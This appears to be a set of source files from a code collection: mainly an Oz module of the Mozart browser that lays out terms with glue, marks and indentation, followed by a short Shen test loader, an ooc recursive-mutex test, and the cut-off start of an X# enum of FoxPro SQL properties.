\ifdef DEBUG_RM {Show 'CompoundRepManagerObject::getTermG' # FN} \endif %% local B N in FN = B#N (CompoundRepManagerObject , GetObjG(b:B ln:N obj:$)).term end end %%% %%% Looping machinery - first/last groups, increment/decrement group %%% numbers, "for" constructors of useful types ... %%% %% %% Yield a nearest greater/smaller or equal non-empty block. %% 'Found' says whether it was found at all; %% meth GetNextBlock(sb:SB b:?B found:$) if SB > @MaxBlock then false elseif {Dictionary.get self.Subterms SB*DInfinite} > 0 then B = SB true else CompoundRepManagerObject , GetNextBlock(sb:(SB+1) b:?B found:$) end end meth GetPrevBlock(sb:SB b:?B found:$) if SB < 0 then false elseif {Dictionary.get self.Subterms SB*DInfinite} > 0 then B = SB true else CompoundRepManagerObject , GetPrevBlock(sb:(SB-1) b:?B found:$) end end %% %% Get number of the first/last group. 'Found' says whether %% they were found at all; %% meth GetFirstGroup(b:?B ln:?N found:Found) CompoundRepManagerObject , GetNextBlock(sb:0 b:B found:Found) N = 1 \ifdef DEBUG_RM {Show 'CompoundRepManagerObject::GetFirstGroup' # Found # B#N} \endif end meth GetLastGroup(b:?B ln:?N found:Found) CompoundRepManagerObject , GetPrevBlock(sb:@MaxBlock b:B found:Found) if Found then N = {Dictionary.get self.Subterms B*DInfinite} end \ifdef DEBUG_RM {Show 'CompoundRepManagerObject::GetLastGroup' # Found # (B#N)} \endif end %% %% These two functions yield a previous/next (valid!) group %% number, provided the start number is a valid one. %% 'Found' says whether there is one; %% meth DecNumber(sb:B sln:N b:?PB ln:?PN found:$) \ifdef DEBUG_RM local Out in Out = \endif %% if N > 1 then PB = B PN = N-1 true elseif B > 0 andthen CompoundRepManagerObject , GetPrevBlock(sb:(B-1) b:PB found:$) then PN = {Dictionary.get self.Subterms PB*DInfinite} true else false end %% \ifdef DEBUG_RM {Show 'CompoundRepManagerObject::DecNumber' # (B#N) # (PB#PN) # Out} Out end \endif end meth IncNumber(sb:B sln:N b:?NB ln:?NN found:$) \ifdef DEBUG_RM local Out in Out = \endif %% if N >= {Dictionary.get self.Subterms B*DInfinite} then %% if CompoundRepManagerObject , GetNextBlock(sb:(B+1) b:NB found:$) then NN = 1 true else false end else NB = B NN = N + 1 true end %% \ifdef DEBUG_RM {Show 'CompoundRepManagerObject::IncNumber' # (B#N) # (NB#NN) # Out} Out end \endif end %% %% Loops over groups in blocks - any directions and steps; %% %% 'B' and 'N' are starting group numbers; %% 'NextMeth' is a method which search for a next group number, %% and yields Found=false if there are none; %% %% 'LM' is a rep' manager's method, which is applied as %% LM(Group Arg ToContinue) %% that is, 'Arg' is passed as a second argument; %% %% A boolean value returned stating whether all groups have %% been applied or not; %% meth ApplyGroups(b:B ln:N next:NextMeth lm:LM arg:Arg cont:Cont) \ifdef DEBUG_RM {Show 'CompoundRepManagerObject::ApplyGroups: ' # B # N # NextMeth # LM # Arg} \endif %% local Group in Group = CompoundRepManagerObject , GetGroup(b:B ln:N group:$) %% Cont = if {self LM(group:Group b:B ln:N arg:Arg cont:$)} then NB NN in if {self NextMeth(sb:B sln:N b:NB ln:NN found:$)} then CompoundRepManagerObject , ApplyGroups(b:NB ln:NN next:NextMeth lm:LM arg:Arg cont:$) else true % all done; end else false end end %% \ifdef DEBUG_RM {Show 'CompoundRepManagerObject::ApplyGroups is finished'} \endif end %% %% a common case - apply all groups; %% meth ApplyAllGroups(lm:LM arg:Arg cont:$) local B N in if CompoundRepManagerObject , GetFirstGroup(b:B ln:N found:$) then CompoundRepManagerObject , ApplyGroups(b:B ln:N next:IncNumber lm:LM arg:Arg cont:$) else true end end end meth ApplyAllGroupsRev(lm:LM arg:Arg cont:$) local B N in if CompoundRepManagerObject , GetLastGroup(b:B ln:N found:$) then CompoundRepManagerObject , ApplyGroups(b:B ln:N next:DecNumber lm:LM arg:Arg cont:$) else true end end end %% %% meth !ApplySubtermObjs(message:Message) \ifdef DEBUG_RM {Show 'CompoundRepManagerObject::ApplySubtermObjs' # Message} \endif CompoundRepManagerObject , ApplyAllGroups(lm:ApplyObj arg:Message cont:_) end %% meth ApplyObj(group:Group b:_ ln:_ arg:Message cont:$) %% if case {Label Group} of e then false [] t then true [] s then false [] st then true [] sgs then false [] sgt then true [] gs then false [] gt then true else {BrowserError 'CompoundRepManagerObject::ApplyObj: unkown group type!'} false end then %% found a subterm object: {Group.obj Message} end %% true % always continue; end %% %% Internal method - that's the code that should appear twice, %% in both 'CloseRep' and 'FastCloseRep'; meth UnsetMarks \ifdef DEBUG_RM {Show 'CompoundRepManagerObject::UnsetMarks'} \endif %% %% there is no message - only local method. %% %% BTW, that's a place where dynamic, highr-order methods %% would be really nice; CompoundRepManagerObject , ApplyAllGroups(lm:UnsetMark arg:InitValue cont:_) end %% meth UnsetMark(group:Group b:B ln:LN arg:Arg cont:$) %% if case {Label Group} of e then false [] t then false [] s then false [] st then false [] sgs then true [] sgt then true [] gs then true [] gt then true else {BrowserError 'CompoundRepManagerObject::UnsetMark: unkown group type!'} false end then %% found a mark: {self.WidgetObj unsetMark(Group.mark)} end %% true % always continue; end %% %% Set the cursor just after a given group in a given block. %% This is implemented by scanning groups backwards with the %% goal to find a mark, and to find a place which indentation %% is known. Simultaneously, distances to a mark found and that %% place with known indentation are obtained (see also the %% comment for the 'ScanToken' class); %% %% The main question is whether a found indentation is a right %% one, and what would happen if it is not. There are the %% following cases (note - they are ordered): %% 1. if there are no subterms, then it can be computed %% from a 'UsedIndentIn' value, and either %% (a) it's correct, then a value obtained is also %% correct. %% (b) it's not correct, then obviously a value %% obtained is not correct too, but this can happen %% only if at least a parent object is requested to %% be checked (some its subterms, before the 'self' %% one, have been changed what have lead to other %% indentation of a 'self's representation). So, %% everything will be corrected anyway. %% 2. if there is a subterm, then the necessary value is %% its 'UsedIndentOut' plus a sum of string sizes after %% it. 'UsedIndentOut' of a subterm may be either %% correct or not, leading to a correct or a wrong value %% of the 'self's 'UsedIndentOut': %% (a) it's correct - then everything is fine; %% (b) it's not - but this can happen only if that %% subter's, and, therefore, 'self's layout will be %% checked too (because it is a father of that %% subterm;) %% 3. if a glue with a line break was found, then an %% indent-out value obtained this way is always correct. %% meth AnchorGroup(b:B ln:LN) \ifdef DEBUG_RM {Show 'CompoundRepManagerObject::AnchorGroup' # B # LN} \endif %% local Token in Token = {New ScanToken init} %% %% If we still have not succeeded in getting of something, %% use 'HeadMark' and 'UsedIndentIn': if CompoundRepManagerObject , ApplyGroups(b:B ln:LN next:DecNumber lm:AnchorGroupRec arg:Token cont:$) then %% is something still missing? %% if {Token gotMark($)} then skip else AuxSizeB = CompoundRepManagerObject , GetAuxSizeB($) in {Token setMarkIncOffset(self.HeadMark AuxSizeB)} end %% if {Token gotIndent($)} then skip else AuxSizeB = CompoundRepManagerObject , GetAuxSizeB($) in {Token setIndent(@UsedIndentIn + AuxSizeB)} end else skip % both anchor and its offset are here; end %% {Token setCursorAt(self.WidgetObj)} end %% \ifdef DEBUG_RM {Show 'CompoundRepManagerObject::AnchorGroup is finished'} \endif end %% meth AnchorGroupRec(group:Group b:_ ln:_ arg:Token cont:$) local GrType in GrType = {Label Group} %% two tasks: to find a mark, and to determine the %% indentation; %% if {Token gotMark($)} then skip else case GrType of e then skip [] t then %% tail mark; {Token setMark(Group.obj.TailMark)} [] s then {Token incOffset(Group.strSize)} [] st then %% tail mark; {Token setMark(Group.obj.TailMark)} [] sgs then %% glue mark; {Token setMarkIncOffset(Group.mark (Group.str2Size + Group.glueSize))} [] sgt then %% tail mark; {Token setMark(Group.obj.TailMark)} [] gs then %% glue mark; {Token setMarkIncOffset(Group.mark (Group.strSize + Group.glueSize))} [] gt then %% tail mark; {Token setMark(Group.obj.TailMark)} else {BrowserError 'CompoundRepManagerObject::AnchorGroupRec: group type??!'} end end %% if {Token gotIndent($)} then skip else case GrType of e then skip [] t then %% fetch 'UsedIndentOut' - and that's all; {Token setIndent({Group.obj GetIndentOut($)})} [] s then {Token incIndent(Group.strSize)} [] st then %% 'UsedIndentOut' ... {Token setIndent({Group.obj GetIndentOut($)})} [] sgs then {Token incIndent(Group.strSize + Group.glueSize + Group.str2Size)} [] sgt then %% 'UsedIndentOut' ... {Token setIndent({Group.obj GetIndentOut($)})} [] gs then {Token incIndent(Group.strSize + Group.glueSize)} [] gt then %% 'UsedIndentOut' ... {Token setIndent({Group.obj GetIndentOut($)})} else fail % will fail ever before; end end %% %% Now, if both the mark and indent came here, terminate %% the loop: if {Token gotMark($)} andthen {Token gotIndent($)} then false else true end end end %% %% It yields 'true' if a line break in a group (within %% the current block) would allow to surround some previous %% subterm's representation by a rectanlge. %% %% In order to find out this, groups scanned backwards from a %% given one (excluding it), and either: %% 1. a group with a subterm object was found, then: %% (a) it does fit within the same line - then it can be %% surrounded by a rectange anyway, %% (b) it does NOT fit - then a line break would help to %% do that. %% 2. a glue was found - then nothing has to be done (that %% glue was checked before by itself); %% 3. otherwise (no groups matching properties 1 or 2 were %% found) - no line break is needed; %% %% Note that the fact that subterm objects are last group %% elements (if ever) is used here; %% meth NeedsLineBreak(b:B ln:N needs:Needs) \ifdef DEBUG_RM {Show 'CompoundRepManagerObject::NeedsLineBreak' # B # N} \endif %% local LNeeds PB PN in %% %% Needs = if CompoundRepManagerObject , DecNumber(sb:B sln:N b:?PB ln:?PN found:$) == false orelse CompoundRepManagerObject , ApplyGroups(b:PB ln:PN next:DecNumber lm:SearchMLSubterms arg:?LNeeds cont:$) then %% have not decided: searched through all available %% groups - case 3. false else %% decided something - return that value; LNeeds end end %% \ifdef DEBUG_RM {Show 'CompoundRepManagerObject::NeedsLineBreak is finished'} \endif end %% %% The method's name stays for "search for a multi-lined %% subterm"; meth SearchMLSubterms(group:Group b:_ ln:_ arg:Needs cont:$) local GrType in GrType = {Label Group} %% %% first, check the case 1. if case GrType of e then false [] t then true [] s then false [] st then true [] sgs then false [] sgt then true [] gs then false [] gt then true else {BrowserError 'CompoundRepManagerObject::SarchMLSubterms: group type??!'} false end then %% found a subterm: Needs = {Group.obj IsMultiLined($)} false %% %% now, look at the case 2.: elseif case GrType of e then false [] t then false [] s then false [] st then false [] sgs then true [] sgt then true [] gs then true [] gt then true else {BrowserError 'CompoundRepManagerObject::SarchMLSubterms: group type??!'} false end then %% found a glue: Needs = false false else true % continue; end end end %% %% First, we check whether the 'check layout' step must be %% performed at all. After that, we walk sequentially through %% all groups, and the final cursor# is the new 'indent-out'; %% %% A cursor positions, both before- and after-, are indefinite %% (but, of course, not the same in general - it can move it); %% meth !CheckLayout(IndentIn ?IndentOut) \ifdef DEBUG_RM {Show 'CompoundRepManagerObject::CheckLayout ' # IndentIn # self.term} \endif %% if IndentIn == @UsedIndentIn andthen @Size == @SavedSize then IndentOut = @UsedIndentOut else %% UsedIndentIn <- IndentIn %% %% Note that nobody else can access 'UsedIndentOut' while %% it "runs" through all the groups - so, it's safe (and %% isn't completely senseless - one can say that it %% "approximates" a right value); UsedIndentOut <- IndentIn + MetaRepManagerObject , GetAuxSizeB($) %% CompoundRepManagerObject , ApplyAllGroups(lm:CheckLayoutGroup arg:InitValue cont:_) %% IndentOut = @UsedIndentOut + MetaRepManagerObject , GetAuxSizeE($) UsedIndentOut <- IndentOut %% %% Note that 'LayoutOK' used here is taken from the %% 'MetaRepManagerobject' - this is because we don't have %% to set 'UsedIndentOut' anymore, and, on the other %% side, we don't know we cursor stays right now; MetaRepManagerObject , LayoutOK end %% \ifdef DEBUG_RM {Show 'CompoundRepManagerObject::CheckLayout is finished ' # IndentOut} \endif end %% %% so, 'UsedIndentOut' keeps 'indent-in', and after that - %% 'indent-out' (which is 'indent-in' for the next group); meth CheckLayoutGroup(group:Group b:B ln:N arg:_ cont:$) \ifdef DEBUG_RM {Show 'CompoundRepManagerObject::CheckLayoutGroup: ' # B # N # @UsedIndentOut} \endif %% UsedIndentOut <- case {Label Group} of e then @UsedIndentOut % rare case? [] t then {Group.obj CheckLayout(@UsedIndentOut $)} [] s then @UsedIndentOut + Group.strSize [] st then UsedIndentOut <- @UsedIndentOut + Group.strSize %% {Group.obj CheckLayout(@UsedIndentOut $)} [] sgs then UsedIndentOut <- @UsedIndentOut + Group.strSize %% CompoundRepManagerObject , CheckGlue(group:Group b:B ln:N) %% %% Now, 'UsedIndentOut' carries new indentation - %% after the glue; @UsedIndentOut + Group.str2Size [] sgt then UsedIndentOut <- @UsedIndentOut + Group.strSize %% CompoundRepManagerObject , CheckGlue(group:Group b:B ln:N) %% {Group.obj CheckLayout(@UsedIndentOut $)} [] gs then %% CompoundRepManagerObject , CheckGlue(group:Group b:B ln:N) %% @UsedIndentOut + Group.strSize [] gt then %% CompoundRepManagerObject , CheckGlue(group:Group b:B ln:N) %% {Group.obj CheckLayout(@UsedIndentOut $)} else {BrowserError 'CompoundRepManagerObject::CheckLayoutGroup: group type??!'} @UsedIndentOut end %% true end %% %% 'UsedIndentOut' keeps the glue's indentation (that is, %% indentation of its mark); meth CheckGlue(group:Group b:B ln:N) local WO ReqNL ReqIndent ReqGlueSize in WO = self.WidgetObj ReqNL = CompoundRepManagerObject , EvalDesc(Group.desc $) %% ReqGlueSize = if ReqNL orelse CompoundRepManagerObject , NeedsLineBreak(b:B ln:N needs:$) then %% requested to be expanded; %% ReqIndent = @UsedIndentIn + {Max CompoundRepManagerObject , EvalDesc(self.indentDesc $) 0} % it cannot be less than 0. Per definition :-) \ifdef DEBUG_RM if ReqIndent >= DInfinite then {BrowserError '... infinity indentation!!!'} end \endif %% if ReqIndent < @UsedIndentOut then %% %% that is, it makes sense to break the line here; ReqIndent + DSpace % + '\n'; else 0 % no line break; end else 0 end \ifdef DEBUG_RM {Show '...CheckGlue: '#(B#N)#ReqNL#Group.glueSize#ReqGlueSize} \endif %% if ReqGlueSize == Group.glueSize then %% either no glue, or of the same size; %% if ReqGlueSize > 0 then UsedIndentOut <- ReqIndent end elseif ReqGlueSize > 0 then NewGroup in %% expanded!; %% %% two subcases - either it was a zero glue, or its %% size is different: %% {WO setCursor(Group.mark @UsedIndentOut)} %% if Group.glueSize == 0 then Spaces in %% %% there were no glue - we have to take care about %% the mark's gravity: Spaces = {CreateSpaces ReqIndent} {WO [setMarkGravity(Group.mark left) insertNL insert(Spaces _) setMarkGravity(Group.mark right)]} %% else GS in GS = Group.glueSize if GS > ReqGlueSize then %% remove something; {WO [advanceCursor(DSpace) deleteForward(GS - ReqGlueSize)]} else SubSpaces in % ReqGlueSize > GS SubSpaces = {CreateSpaces (ReqGlueSize - GS)} %% {WO [advanceCursor(DSpace) insert(SubSpaces _)]} end end %% NewGroup = {AdjoinAt Group glueSize ReqGlueSize} CompoundRepManagerObject , ReplaceGroup(b:B ln:N group:NewGroup) %% UsedIndentOut <- ReqIndent else NewGroup in % ReqGlueSize == 0 and Group.glueSize \= 0 %% that is, there may be no glue but there is one - %% remove it; %% {WO [setCursor(Group.mark @UsedIndentOut) deleteForward(Group.glueSize)]} %% NewGroup = {AdjoinAt Group glueSize 0} CompoundRepManagerObject , ReplaceGroup(b:B ln:N group:NewGroup) %% %% 'UsedIndentOut' keeps its value; end end end %% %% Checks whether 'STObj' is still a subterm object, and if so - %% updates the size; meth !SubtermSizeChanged(STObj OldSize NewSize) \ifdef DEBUG_RM {Show 'CompoundRepManagerObject::SubtermSizeChanged' # STObj.numberOf # OldSize # NewSize} \endif %% local FN B N in FN = STObj.numberOf FN = B#N %% if CompoundRepManagerObject , isGroup(b:B ln:N is:$) andthen STObj == CompoundRepManagerObject , GetObjG(b:B ln:N obj:$) then MyOldSize MyNewSize in MyOldSize = @Size %% %% 'SavedSize' is unequal to 'Size' - 'CheckLayout' is %% requested; MyNewSize = MyOldSize - OldSize + NewSize Size <- MyNewSize MetaRepManagerObject , LayoutWrong %% %% up to a root term object; ControlObject , SizeChanged(MyOldSize MyNewSize) end end %% \ifdef DEBUG_RM {Show 'CompoundRepManagerObject::SubtermSizeChanged is finished'} \endif end %% %% 'Draw' primitives; %% %% meth putG_E(ln:LN) \ifdef DEBUG_RM {Show 'CompoundRepManagerObject::putG_E'} \endif %% CompoundRepManagerObject , StoreNewGroup(ln:LN group:e) end %% meth putG_S(ln:LN str:Str) \ifdef DEBUG_RM {Show 'CompoundRepManagerObject::putG_S' # LN} \endif %% local StrSize Group in %% StrSize = {self.WidgetObj insert(Str $)} Size <- @Size + StrSize %% Group = s(strSize: StrSize) CompoundRepManagerObject , StoreNewGroup(ln:LN group:Group) end %% \ifdef DEBUG_RM {Show 'CompoundRepManagerObject::putG_S is finished'} \endif end %% meth putG_T(ln:LN term:Term) \ifdef DEBUG_RM {Show 'CompoundRepManagerObject::putG_T' # LN} \endif %% local Obj ObjSize Group in %% %% Obj = CompoundControlObject , PutSubterm(n: @CurrentBlock # LN st: Term obj: $) %% ObjSize = {Obj GetSize($)} Size <- @Size + ObjSize %% Group = t(obj: Obj) CompoundRepManagerObject , StoreNewGroup(ln:LN group:Group) end %% \ifdef DEBUG_RM {Show 'CompoundRepManagerObject::putG_T is finished'} \endif end %% meth putG_ST(ln:LN str:Str term:Term) \ifdef DEBUG_RM {Show 'CompoundRepManagerObject::putG_ST' # LN} \endif %% local StrSize Obj ObjSize Group in %% %% StrSize = {self.WidgetObj insert(Str $)} %% Obj = CompoundControlObject , PutSubterm(n: @CurrentBlock # LN st: Term obj: $) %% ObjSize = {Obj GetSize($)} Size <- @Size + StrSize + ObjSize %% Group = st(strSize:StrSize obj:Obj) CompoundRepManagerObject , StoreNewGroup(ln:LN group:Group) end %% \ifdef DEBUG_RM {Show 'CompoundRepManagerObject::putG_ST is finished'} \endif end %% %% 'GlueMark' is a (new) glue mark, and 'GlueSize' - the size %% of the glue being put. Note that the 'glue' mark is %% temporarily set with the left gravity - this has to be %% toggled later; meth PutGlue(ln:LN dp:DP gm:?GlueMark gs:?GlueSize) local WO LineSize GlueIndent in WO = self.WidgetObj LineSize = {self.store read(StoreTWWidth $)} %% %% Set the glue's mark; GlueMark = {WO putMark(left left#self $)} GlueIndent = {WO getCursorCol($)} %% %% Decide whether this glue should be extended or not, %% what is done using the 'decision procedure'. GlueSize = if {DP @UsedIndentIn GlueIndent LineSize} orelse CompoundRepManagerObject , NeedsLineBreak(b:@CurrentBlock ln:LN needs:$) then ReqIndent in %% line break is requested; %% ReqIndent = @UsedIndentIn + {Max CompoundRepManagerObject , EvalDesc(self.indentDesc $) 0} % it cannot be less than 0. Per definition :-) \ifdef DEBUG_RM if ReqIndent >= DInfinite then {BrowserError '... infinity indentation!!!'} end \endif %% if ReqIndent < GlueIndent then Spaces in %% %% ... it makes sense to break the line here; Spaces = {CreateSpaces ReqIndent} {WO [insertNL insert(Spaces _)]} %% the (Browser) Tcl/Tk interface keeps now new %% column#; ReqIndent + DSpace % i.e. + '\n'; else 0 % no line break - an empty glue; end else 0 % no line break has been ever requested; end end end %% meth putG_SGT(ln:LN str:Str dp:DP desc:Desc term:Term) \ifdef DEBUG_RM {Show 'CompoundRepManagerObject::putG_SGT' # LN} \endif %% local WO StrSize GlueMark GlueSize Obj ObjSize Group in WO = self.WidgetObj %% StrSize = {WO insert(Str $)} %% CompoundRepManagerObject , PutGlue(ln:LN dp:DP gm:GlueMark gs:GlueSize) %% Obj = CompoundControlObject , PutSubterm(n: @CurrentBlock # LN st: Term obj: $) %% {WO setMarkGravity(GlueMark right)} %% ObjSize = {Obj GetSize($)} Size <- @Size + StrSize + ObjSize %% Group = sgt(strSize: StrSize mark: GlueMark desc: Desc glueSize: GlueSize obj: Obj) %% CompoundRepManagerObject , StoreNewGroup(ln:LN group:Group) end %% \ifdef DEBUG_RM {Show 'CompoundRepManagerObject::putG_SGT is finished'} \endif end %% meth putG_SGS(ln:LN str:Str dp:DP desc:Desc str2:Str2) \ifdef DEBUG_RM {Show 'CompoundRepManagerObject::putG_SGS' # LN} \endif %% local WO StrSize GlueMark GlueSize Str2Size Group in WO = self.WidgetObj %% StrSize = {WO insert(Str $)} %% CompoundRepManagerObject , PutGlue(ln:LN dp:DP gm:GlueMark gs:GlueSize) %% Str2Size = {WO [insert(Str2 $) setMarkGravity(GlueMark right)]} %% Size <- @Size + StrSize + Str2Size %% Group = sgs(strSize: StrSize mark: GlueMark desc: Desc glueSize: GlueSize str2Size: Str2Size) %% CompoundRepManagerObject , StoreNewGroup(ln:LN group:Group) end %% \ifdef DEBUG_RM {Show 'CompoundRepManagerObject::putG_SGS is finished'} \endif end %% meth putG_GS(ln:LN dp:DP desc:Desc str:Str) \ifdef DEBUG_RM {Show 'CompoundRepManagerObject::putG_GS' # LN} \endif %% local WO StrSize GlueMark GlueSize Group in WO = self.WidgetObj %% CompoundRepManagerObject , PutGlue(ln:LN dp:DP gm:GlueMark gs:GlueSize) %% StrSize = {WO [insert(Str $) setMarkGravity(GlueMark right)]} %% Size <- @Size + StrSize %% Group = gs(mark: GlueMark desc: Desc glueSize: GlueSize strSize: StrSize) %% CompoundRepManagerObject , StoreNewGroup(ln:LN group:Group) end %% \ifdef DEBUG_RM {Show 'CompoundRepManagerObject::putG_GS is finished'} \endif end %% meth putG_GT(ln:LN dp:DP desc:Desc term:Term) \ifdef DEBUG_RM {Show 'CompoundRepManagerObject::putG_GT' # LN} \endif %% local WO Obj ObjSize GlueMark GlueSize Group in WO = self.WidgetObj %% CompoundRepManagerObject , PutGlue(ln:LN dp:DP gm:GlueMark gs:GlueSize) %% Obj = CompoundControlObject , PutSubterm(n: @CurrentBlock # LN st: Term obj: $) %% {WO setMarkGravity(GlueMark right)} %% ObjSize = {Obj GetSize($)} Size <- @Size + ObjSize %% Group = gt(mark: GlueMark desc: Desc glueSize: GlueSize obj: Obj) %% CompoundRepManagerObject , StoreNewGroup(ln:LN group:Group) end %% \ifdef DEBUG_RM {Show 'CompoundRepManagerObject::putG_GT is finished'} \endif end %% %% meth EvalDesc(IndExpr $) %% if {Int.is IndExpr} then IndExpr else case IndExpr of st_size(N) then B LN in N = B#LN %% if CompoundRepManagerObject , isGroup(b:B ln:LN is:$) then Group in Group = CompoundRepManagerObject , GetGroup(b:B ln:LN group:$) %% \ifdef DEBUG_RM if case {Label Group} of e then false [] t then true [] s then false [] st then true [] sgs then false [] sgt then true [] gs then false [] gt then true else {BrowserError 'CompoundRepManagerObject::EvalDesc: group type??!'} false end then skip % fine - there is an object; else {BrowserError 'CompoundRepManagerObject::EvalDesc: no object in a group!'} end \endif %% {Group.obj GetSize($)} else 0 end [] gr_size(N) then B LN in N = B#LN %% if CompoundRepManagerObject , isGroup(b:B ln:LN is:$) then Group in Group = CompoundRepManagerObject , GetGroup(b:B ln:LN group:$) %% case {Label Group} of e then 0 [] t then {Group.obj GetSize($)} [] s then Group.strSize [] st then {Group.obj GetSize($)} + Group.strSize [] sgs then Group.strSize + Group.str2Size [] sgt then {Group.obj GetSize($)} + Group.strSize [] gs then Group.strSize [] gt then {Group.obj GetSize($)} else {BrowserError 'CompoundRepManagerObject::EvalDesc: group type??!'} 0 end else 0 end [] self_size then @Size [] line_size then {self.store read(StoreTWWidth $)} %% %% Note that 'UsedIndentOut' contains the current %% position in a line in the 'refineLayout' context, where %% 'EvalDesc' is used! [] current then @UsedIndentOut [] st_indent(N) then B LN in N = B#LN %% if CompoundRepManagerObject , isGroup(b:B ln:LN is:$) then Group in Group = CompoundRepManagerObject , GetGroup(b:B ln:LN group:$) %% \ifdef DEBUG_RM if case {Label Group} of e then false [] t then true [] s then false [] st then true [] sgs then false [] sgt then true [] gs then false [] gt then true else {BrowserError 'CompoundRepManagerObject::EvalDesc: group type??!'} false end then skip % fine - there is an object; else {BrowserError 'CompoundRepManagerObject::EvalDesc: no object in a group!'} end \endif %% {Group.obj GetIndentIn($)} else DInfinite end [] self_indent then @UsedIndentIn [] '+'(A1 A2) then R1 R2 in %% CompoundRepManagerObject , EvalDesc(A1 R1) CompoundRepManagerObject , EvalDesc(A2 R2) %% R1 + R2 [] '-'(A1 A2) then R1 R2 in %% CompoundRepManagerObject , EvalDesc(A1 R1) CompoundRepManagerObject , EvalDesc(A2 R2) %% R1 - R2 [] 'min'(A1 A2) then R1 R2 in %% CompoundRepManagerObject , EvalDesc(A1 R1) CompoundRepManagerObject , EvalDesc(A2 R2) %% {Min R1 R2} [] 'max'(A1 A2) then R1 R2 in %% CompoundRepManagerObject , EvalDesc(A1 R1) CompoundRepManagerObject , EvalDesc(A2 R2) %% {Max R1 R2} [] '>'(A1 A2) then R1 R2 in %% CompoundRepManagerObject , EvalDesc(A1 R1) CompoundRepManagerObject , EvalDesc(A2 R2) %% R1 > R2 [] '<'(A1 A2) then R1 R2 in %% CompoundRepManagerObject , EvalDesc(A1 R1) CompoundRepManagerObject , EvalDesc(A2 R2) %% R1 < R2 else {BrowserError 'CompoundRepManagerObject::EvalDesc: expression??!'} DInfinite end end end %% %% meth replaceTermG(fn:FN term:Term) \ifdef DEBUG_RM {Show 'CompoundRepManagerObject::replaceTermG' # FN} \endif %% local WO SwapGravity B LN OldGroup OldSize NewObj NewSize NewGroup in WO = self.WidgetObj FN = B#LN %% OldGroup = CompoundRepManagerObject , GetGroup(b:B ln:LN group:$) %% %% It is true whenever a glue's mark (which normally has %% the right gravity) can escape its location; SwapGravity = case {Label OldGroup} of e then false [] t then false [] s then false [] st then false [] sgs then true [] sgt then true [] gs then true [] gt then true else {BrowserError 'CompoundRepManagerObject::ApplyObj: unkown group type!'} false end andthen OldGroup.glueSize == 0 %% if SwapGravity then {WO setMarkGravity(OldGroup.mark left)} end %% %% ... but before, set the cursor at a right position; local OGObj = OldGroup.obj in OldSize = {OGObj GetSize($)} {OGObj SetCursorAt} {OGObj Close} end %% %% the cursor has been moved - the 'CurrentBlock' is %% lost. Note that this must be the case since otherwise %% 'block' and 'AnchorLB' primitives will be misleaded; CurrentBlock <- InitValue %% NewObj = CompoundControlObject , PutSubterm(n: FN st: Term obj: $) %% if SwapGravity then {WO setMarkGravity(OldGroup.mark right)} end %% %% and now, modify own size; NewSize = {NewObj GetSize($)} Size <- @Size - OldSize + NewSize %% %% don't know what else is stored in there; NewGroup = {AdjoinAt OldGroup obj NewObj} CompoundRepManagerObject , ReplaceGroup(b:B ln:LN group:NewGroup) end %% \ifdef DEBUG_RM {Show 'CompoundRepManagerObject::replaceTermG is finished'} \endif end %% %% Currently only the removing of a last group in a block is %% implemented. Basically, one have to use 'AnchorGroup' in %% order a "starting" point ('CurrentBlock' is going lost), and %% after that - as one would expect ... %% %% Note that the cursor is located just after that group; %% meth removeG(ln:LN) \ifdef DEBUG_RM {Show 'CompoundRepManagerObject::removeG' # LN} %% if LN == {Dictionary.get self.Subterms (@CurrentBlock*DInfinite)} then skip % ok; else {BrowserError 'CompoundRepManagerObject::removeG: not the last group!!!'} end \endif %% local WO Group in WO = self.WidgetObj Group = CompoundRepManagerObject , GetGroup(b:@CurrentBlock ln:LN group:$) CompoundRepManagerObject , RemoveLastGroup %% Size <- @Size - case {Label Group} of e then 0 [] t then Size GObj = Group.obj in Size = {GObj GetSize($)} {GObj Close} Size [] s then {WO deleteBackward(Group.strSize)} Group.strSize [] st then GObj = Group.obj ObjSize in ObjSize = {GObj GetSize($)} {GObj Close} {WO deleteBackward(Group.strSize)} ObjSize + Group.strSize [] sgs then Size in Size = Group.strSize + Group.str2Size {WO deleteBackward(Size + Group.glueSize)} Size [] sgt then GObj = Group.obj ObjSize in ObjSize = {GObj GetSize($)} {GObj Close} {WO deleteBackward(Group.glueSize + Group.strSize)} ObjSize + Group.strSize [] gs then {WO deleteBackward(Group.glueSize + Group.strSize)} Group.strSize [] gt then GObj = Group.obj ObjSize in ObjSize = {GObj GetSize($)} {GObj Close} {WO deleteBackward(Group.glueSize)} ObjSize else {BrowserError 'CompoundRepManagerObject::removeG: unkown group type!'} 0 end end %% \ifdef DEBUG_RM {Show 'CompoundRepManagerObject::removeG is finished'} \endif end %% end %% end
Oz
5
Ahzed11/mozart2
lib/tools/browser/browser/repManager.oz
[ "BSD-2-Clause" ]
(load "harness.shen") (load "kerneltests.shen")
Shen
0
tizoc/chibi-shen
shen-test-programs/runme.shen
[ "BSD-3-Clause" ]
import threading/Thread import structs/ArrayList threads := ArrayList<Thread> new() mutex := RecursiveMutex new() counter := 0 for (i in 0..42) { threads add(Thread new(|| for (i in 0..10) mutex lock() counter += 1 for (i in 0..10) mutex unlock() )) } for (t in threads) t start() for (t in threads) t wait() // prints counter = 42 "counter = %d" printfln(counter)
ooc
3
shamanas/rock
test/sdk/threading/recmutex.ooc
[ "MIT" ]
USING System.Collections.Generic /// <summary>Enum that matches the various FoxPro Sql properties, used in SqlGetProp() and SqlSetProp()</summary> /// <seealso cref="O:XSharp.VFP.Functions.SqlGetProp" /> /// <seealso cref="O:XSharp.VFP.Functions.SqlSetProp" /> ENUM XSharp.RDD.SQLProperty /// <summary>Specifies whether result sets are returned synchronously.</summary> MEMBER Asynchronous /// <summary>Specifies whether SqlExec( ) returns result sets all at once (True (.T.), the default), /// or individually with SqlMoreResults( ) (False (.F.)).</summary> /// <seealso cref="O:XSharp.VFP.Functions.SqlExec" /> /// <seealso cref="O:XSharp.VFP.Functions.SqlMoreResults" /> MEMBER BatchMode /// <summary>Contains True (.T.) if a shared connection is busy; otherwise contains False (.F.).</summary> MEMBER ConnectBusy /// <summary>The login connection string.</summary> MEMBER ConnectString /// <summary>Specifies the time to wait (in seconds) before returning a connection time-out error. /// If you specify 0, the wait is indefinite and a time-out error is never returned. ConnectTimeOut can be 0 to 600. The default is 15.</summary> MEMBER ConnectTimeOut /// <summary>The name of the data source as defined in the ODBC.INI file.</summary> MEMBER DataSource /// <summary>Specifies if a pending transaction is committed or rolled back when SqlDisconnect( ) is called for the last connection handle.</summary> /// <seealso cref="O:XSharp.VFP.Functions.SqlDisconnect" /> MEMBER DisconnectRollback /// <summary>Contains a numeric value that determines when the 